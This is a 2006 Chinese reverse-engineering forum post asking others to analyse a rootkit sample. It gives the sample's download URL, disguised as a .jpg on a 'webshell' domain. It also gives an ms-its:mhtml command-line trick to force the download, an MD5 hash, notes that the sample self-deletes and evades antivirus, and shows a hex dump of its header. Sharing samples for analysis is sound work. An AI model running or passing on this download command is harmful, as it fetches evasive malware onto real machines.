-
-
谁有空分析一下rootkit
-
发表于:
2006-5-5 22:06
5828
-
下载地址为
http://webshell.cardb.cn/err_404.jpg::/svchost.exe
一般的浏览器方式下载不了,需在命令行键入
start ms-its:mhtml:c:\\.mht!http://webshell.cardb.cn/err_404.jpg::/svchost.exe
确认下载,其md5
为8a6c75beecfdeecb891495fb530fdcb7 svchost.exe
23,472 字节,执行后程序自删除,iceword.exe查不出任何异端,最新杀毒软件差不出
用winhex看,文件做的很精致
00000000 4D 5A 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 00 MZKERNEL32.DLL..
00000010 50 45 00 00 4C 01 03 00 BE B0 11 40 00 AD 50 FF PE..L...景.@.??
00000020 76 34 EB 7C 48 01 0F 01 0B 01 4C 6F 61 64 4C 69 v4朦H.....LoadLi
00000030 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 braryA..........
00000040 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 . ....@.........
00000050 04 00 00 00 00 00 3A 00 04 00 00 00 00 00 00 00 ......:.........
00000060 00 90 01 00 00 02 00 00 00 00 00 00 02 00 00 00 .?.............
打微狗很累了,改天自己分析一下。
[课程]FART 脱壳王!加量不加价!FART作者讲授!